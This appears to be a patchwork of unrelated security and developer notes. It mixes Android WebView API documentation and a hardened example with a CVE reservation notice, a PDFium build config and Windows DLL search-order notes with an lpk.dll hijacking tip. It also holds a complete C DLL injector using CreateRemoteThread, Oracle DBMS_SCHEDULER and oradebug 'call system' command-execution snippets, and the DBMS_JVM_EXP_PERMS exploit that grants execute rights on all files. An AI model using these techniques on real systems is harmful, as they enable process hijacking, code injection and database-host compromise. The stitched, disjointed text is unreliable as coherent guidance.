public void addJavascriptInterface (Object object, String name) Added in API level 1
Injects the supplied Java object into this WebView. The object is injected into the JavaScript context of the main frame, using the supplied name. This allows the Java object's methods to be accessed from JavaScript. For applications targeted to API level JELLY_BEAN_MR1 and above, only public methods that are annotated with JavascriptInterface can be accessed from JavaScript. For applications targeted to API level JELLY_BEAN or below, all public methods (including the inherited ones) can be accessed, see the important security note below for implications.
Note that injected objects will not appear in JavaScript until the page is next (re)loaded. For example:
```java
class JsObject {
    @JavascriptInterface
    public String toString() { return "injectedObject"; }
}
```
This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for apps targeting JELLY_BEAN or earlier. Apps that target a version later than JELLY_BEAN are still vulnerable if the app runs on a device running Android earlier than 4.2. The most secure way to use this method is to target JELLY_BEAN_MR1 and to ensure the method is called only when running on Android 4.2 or later. With these older versions, JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content. JavaScript interacts with Java object on a private, background thread of this WebView. Care is therefore required to maintain thread safety.
The Java object's fields are not accessible. For applications targeted to API level LOLLIPOP and above, methods of injected Java objects are enumerable from JavaScript.

Parameters
object: the Java object to inject into this WebView's JavaScript context. Null values are ignored.
name: the name used to expose the object in JavaScript.
WebViewClient: public boolean shouldOverrideUrlLoading (WebView view, String url)
Gives the host application a chance to take over control when a new URL is about to be loaded in the current WebView. If no WebViewClient is provided, by default the WebView asks the Activity Manager to choose the proper handler for the URL. If a WebViewClient is provided, returning true means the host application handles the URL, while returning false means the current WebView handles the URL. This method is not called for requests using the POST "method".
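The two API notes above fit together in one pattern: expose a bridge object only where the @JavascriptInterface filter actually applies, and use shouldOverrideUrlLoading to keep the WebView on a single trusted origin. The following is an added example, not code from the Android documentation quoted above; TRUSTED_HOST, the Bridge class and its method names are illustrative assumptions, and it assumes the app's manifest declares targetSdkVersion 17 (JELLY_BEAN_MR1) or higher, since below that the annotation is ignored entirely.

```java
import android.annotation.SuppressLint;
import android.net.Uri;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.Toast;

/*
 * Added example (not from the Android docs). TRUSTED_HOST, Bridge and the
 * method names are assumptions. Requires targetSdkVersion >= 17, otherwise
 * the @JavascriptInterface filter is not applied and every public method
 * of the injected object is reachable from JavaScript.
 */
public final class HardenedWebView {

    /** The only host this WebView may navigate to (assumption). */
    static final String TRUSTED_HOST = "app.example.com";

    /** Object injected as window.AndroidBridge. */
    public static final class Bridge {
        private final WebView webView;

        Bridge(WebView webView) {
            this.webView = webView;
        }

        /* Reachable from JavaScript because it is annotated. Runs on the
         * WebView's private background thread, so it must not touch views. */
        @JavascriptInterface
        public String appVersion() {
            return "1.0";
        }

        @JavascriptInterface
        public void toast(final String message) {
            // Hop back to the UI thread before touching any UI object.
            webView.post(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(webView.getContext(), message, Toast.LENGTH_SHORT).show();
                }
            });
        }

        /* Public but NOT annotated: invisible to JavaScript on API 17+.
         * On API 16 and below it would be callable, and java.lang.Runtime
         * would be reachable through getClass() reflection as well. */
        public void internalOnly() {
        }
    }

    /** Navigation allow-list: https and exactly TRUSTED_HOST. */
    static boolean isTrusted(String url) {
        Uri uri = Uri.parse(url);
        return "https".equals(uri.getScheme())
                && uri.getHost() != null
                && uri.getHost().equalsIgnoreCase(TRUSTED_HOST);
    }

    @SuppressLint("SetJavaScriptEnabled")
    public static void configure(WebView webView) {
        webView.getSettings().setJavaScriptEnabled(true);

        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                // true  = "the app handled it" (here: the navigation is dropped),
                // false = let the WebView load it. Not invoked for POST requests.
                return !isTrusted(url);
            }
        });

        // The annotation filter only exists on Android 4.2 (API 17) and later.
        // On older devices any page loaded here could reach java.lang.Runtime
        // through the injected object, so expose nothing at all there.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new Bridge(webView), "AndroidBridge");
        }

        // The injected object only becomes visible after the next (re)load.
        webView.loadUrl("https://" + TRUSTED_HOST + "/");
    }
}
```

From page script, `AndroidBridge.appVersion()` returns "1.0" while `AndroidBridge.internalOnly` is undefined on 4.2+. Note that shouldOverrideUrlLoading gates navigations only: scripts, frames and other subresources the trusted page pulls in are still loaded, so the allow-list is no substitute for serving that page over HTTPS and treating everything it embeds as reaching the bridge.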
IMPORTANT: Once a CVE ID is assigned to your vulnerability, it will not be published in the CVE List until you have submitted a URL pointing to public information about the vulnerability. Without a public reference, the CVE ID will display as "RESERVED" in the CVE List. Please update CVE with a reference to the vulnerability's details as soon as possible. See this FAQ for more information.
Simply leave the public reference blank and you can request a RESERVED CVE. Once the CVE program receives the request, a confirmation e-mail is sent.
a. The directory from which the application loaded.
b. The current directory.
c. The system directory. Use the GetSystemDirectory function to get the path of this directory.
d. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
e. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
f. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.

This is the order with SafeDllSearchMode disabled; with it enabled (the default since Windows XP SP2) the current directory moves down to just before the PATH entries. Either way the application's own directory is searched first, ahead of System32, which is what the lpk.dll trick relies on.
So placing lpk.dll in the same directory as the running program is enough.
Why lpk.dll is chosen
Starting with Windows 7, an LPK.dll placed next to the program is no longer loaded by default: lpk.dll is listed under KnownDLLs, so the loader takes it from System32 regardless of the search order above. To have Windows 7 load LPK.dll from the application directory, the registry has to be changed; import the registry entries below, and they take effect after a reboot.
```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Minimal LoadLibraryA / CreateRemoteThread injector.
 * Usage: inject.exe <pid> <absolute path to dll>
 * Injector, target process and DLL must all be the same bitness; pass an
 * absolute path so the target's own DLL search order does not come into play.
 */
int main(int argc, char *argv[])
{
    if (argc != 3) {
        printf("Usage: %s <pid> <dll path>\n", argv[0]);
        return 1;
    }
    DWORD procID = (DWORD)strtoul(argv[1], NULL, 10);
    const char *buffer = argv[2];
    SIZE_T len = strlen(buffer) + 1;  /* +1: LoadLibraryA needs the terminating NUL */

    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
    if (process == NULL) {
        printf("Error: the specified process couldn't be found.\n");
        return 1;
    }

    /*
     * Get address of the LoadLibrary function. kernel32.dll is mapped at the
     * same base address in every process of the same bitness, so the local
     * address is valid inside the target as well.
     */
    LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    if (addr == NULL) {
        printf("Error: the LoadLibraryA function was not found inside kernel32.dll library.\n");
        CloseHandle(process);
        return 1;
    }

    /*
     * Allocate new memory region inside the process's address space.
     */
    LPVOID arg = VirtualAllocEx(process, NULL, len, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (arg == NULL) {
        printf("Error: the memory could not be allocated inside the chosen process.\n");
        CloseHandle(process);
        return 1;
    }

    /*
     * Write the argument to LoadLibraryA (the DLL path) to the newly allocated region.
     */
    if (!WriteProcessMemory(process, arg, buffer, len, NULL)) {
        printf("Error: there were no bytes written to the process's address space.\n");
        VirtualFreeEx(process, arg, 0, MEM_RELEASE);
        CloseHandle(process);
        return 1;
    }

    /*
     * Inject our DLL: a remote thread whose start routine is LoadLibraryA(arg).
     */
    HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, 0, NULL);
    if (thread == NULL) {
        printf("Error: the remote thread could not be created.\n");
    } else {
        printf("Success: the remote thread was successfully created.\n");
        WaitForSingleObject(thread, INFINITE);  /* wait until LoadLibraryA returns */
        CloseHandle(thread);
    }

    /* Release the remote buffer and the process handle, because the DLL is already loaded. */
    VirtualFreeEx(process, arg, 0, MEM_RELEASE);
    CloseHandle(process);
    return thread == NULL ? 1 : 0;
}
```
```
# Build arguments go here.
# See "gn args <out_dir> --list" for available build arguments.
use_goma = false                  # Googlers only. Make sure goma is installed and running first.
is_debug = false                  # Enable debugging features.

pdf_use_skia = true               # Set true to enable experimental skia backend.
pdf_use_skia_paths = false        # Set true to enable experimental skia backend (paths only).

pdf_enable_xfa = true             # Set false to remove XFA support (implies JS support).
pdf_enable_v8 = true              # Set false to remove Javascript support.
pdf_is_standalone = true          # Set for a non-embedded build.
is_component_build = false        # Disable component build (must be false)
v8_static_library = true

clang_use_chrome_plugins = false  # Currently must be false.
use_sysroot = false               # Currently must be false on Linux, but entirely omitted on windows.
```
```sql
BEGIN
  DBMS_SCHEDULER.CREATE_PROGRAM (
    program_name   => 'MyCmd',
    program_type   => 'EXECUTABLE',
    -- Use the ampersand to breakout
    program_action => '/tmp/a.sh',
    enabled        => TRUE,
    comments       => 'Run a command using shell metacharacters.'
  );
END;
/
```

Creating the program by itself runs nothing: a job has to reference it (DBMS_SCHEDULER.CREATE_JOB, then RUN_JOB or a schedule), and the session needs the CREATE JOB and CREATE EXTERNAL JOB privileges. On Unix the command runs as the OS account configured for external jobs (from 11g, the run_user in externaljob.ora, nobody by default), not as the oracle user.
```
SQL> oradebug help
HELP           [command]                                   Describe one or all commands
SETMYPID                                                   Debug current process
SETOSPID       <ospid>                                     Set OS pid of process to debug
SETORAPID      <orapid> ['force']                          Set Oracle pid of process to debug
SETORAPNAME    <orapname>                                  Set Oracle process name to debug
SHORT_STACK                                                Get abridged OS stack
CURRENT_SQL                                                Get current SQL
DUMP           <dump_name> <lvl> [addr]                    Invoke named dump
DUMPSGA        [bytes]                                     Dump fixed SGA
DUMPLIST                                                   Print a list of available dumps
EVENT          <text>                                      Set trace event in process
SESSION_EVENT  <text>                                      Set trace event in session
DUMPVAR        <p|s|uga> <name> [level]                    Print/dump a fixed PGA/SGA/UGA variable
DUMPTYPE       <address> <type> <count>                    Print/dump an address with type info
SETVAR         <p|s|uga> <name> <value>                    Modify a fixed PGA/SGA/UGA variable
PEEK           <addr> <len> [level]                        Print/Dump memory
POKE           <addr> <len> <value>                        Modify memory
WAKEUP         <orapid>                                    Wake up Oracle process
SUSPEND                                                    Suspend execution
RESUME                                                     Resume execution
FLUSH                                                      Flush pending writes to trace file
CLOSE_TRACE                                                Close trace file
TRACEFILE_NAME                                             Get name of trace file
LKDEBUG                                                    Invoke global enqueue service debugger
NSDBX                                                      Invoke CGS name-service debugger
-G             <Inst-List | def | all>                     Parallel oradebug command prefix
-R             <Inst-List | def | all>                     Parallel oradebug prefix (return output
SETINST        <instance# .. | all>                        Set instance list in double quotes
SGATOFILE      <SGA dump dir>                              Dump SGA to file; dirname in double quotes
DMPCOWSGA      <SGA dump dir>                              Dump & map SGA as COW; dirname in double quotes
MAPCOWSGA      <SGA dump dir>                              Map SGA as COW; dirname in double quotes
HANGANALYZE    [level] [syslevel]                          Analyze system hang
FFBEGIN                                                    Flash Freeze the Instance
FFDEREGISTER                                               FF deregister instance from cluster
FFTERMINST                                                 Call exit and terminate instance
FFRESUMEINST                                               Resume the flash frozen instance
FFSTATUS                                                   Flash freeze status of instance
SKDSTTPCS      <ifname> <ofname>                           Helps translate PCs to names
WATCH          <address> <len> <self|exist|all|target>     Watch a region of memory
DELETE         <local|global|target> watchpoint <id>       Delete a watchpoint
SHOW           <local|global|target> watchpoints           Show watchpoints
DIRECT_ACCESS  <set/enable/disable command | select query> Fixed table access
CORE                                                       Dump core without crashing process
IPC                                                        Dump ipc information
UNLIMIT                                                    Unlimit the size of the trace file
PROCSTAT                                                   Dump process statistics
CALL           [-t count] <func> [arg1]...[argn]           Invoke function with arguments
```
The feature set is very rich; the one used below is CALL, which invokes a function directly inside the Oracle server process (here libc's system()).
Statements executed
```
oradebug setmypid;
oradebug call system "/usr/bin/whoami	>/tmp/ret";
```
Note
SYSDBA privileges are required.
Inside the double quotes the separator must be a TAB, not a space: oradebug splits its own command line on spaces, so a space inside the argument would turn it into several arguments, while the shell that system() spawns still treats a TAB as whitespace.
This works against Oracle on both Linux and Windows.
2. Hacker methods
The two methods used below were disclosed by David Litchfield at Black Hat DC 2010 and were found through reverse engineering. Combined with the DBMS_JVM_EXP_PERMS vulnerability they allow direct execution of system commands (the DBMS_JVM_EXP_PERMS vulnerability has since been patched).
```sql
DECLARE
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  CURSOR C1 IS
    SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED'
    FROM dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  -- Grants the current user execute permission on every file via the Java policy table.
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
```